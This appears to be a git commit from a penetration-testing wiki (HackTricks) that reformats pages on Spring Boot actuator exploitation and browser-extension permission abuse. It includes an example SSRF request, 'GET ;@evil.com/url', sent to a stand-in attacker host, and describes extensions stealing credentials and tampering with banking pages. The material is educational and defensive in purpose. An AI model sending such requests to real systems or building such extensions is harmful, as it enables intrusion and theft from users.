This commit is contained in:
Carlos Polop 2025-01-28 23:50:43 +01:00
parent cc776534e2
commit 364e26191e
2 changed files with 11 additions and 11 deletions

View File

@ -52,16 +52,16 @@
1. **Env + H2 RCE**:
- Details on exploiting the combination of `/env` endpoint and H2 database can be found [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
- Example exploit request:
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
- Example exploit request:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
{{#include ../../banners/hacktricks-training.md}}

View File

@ -59,7 +59,7 @@ Both APIs allow executing not merely files contained in the extensions as conten
> [!CAUTION]
> In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
### Implicit privileges <a href="#implicit-privileges" id="implicit-privileges"></a>
### Implicit privileges
Some extension privileges **dont have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely wont know which website these tabs correspond with.
@ -72,7 +72,7 @@ If you look through possible `tabs.create()` parameters, youll also notice th
[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
### Webcam, geolocation and friends <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
### Webcam, geolocation and friends
You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). Its features with considerable potential for abuse, so users each time have to confirm that they still want this.
@ -87,7 +87,7 @@ Adding the **`history`** keyword to the [permissions entry](https://developer.mo
The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
### Storage permission <a href="#the-storage-permission" id="the-storage-permission"></a>
### Storage permission
The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.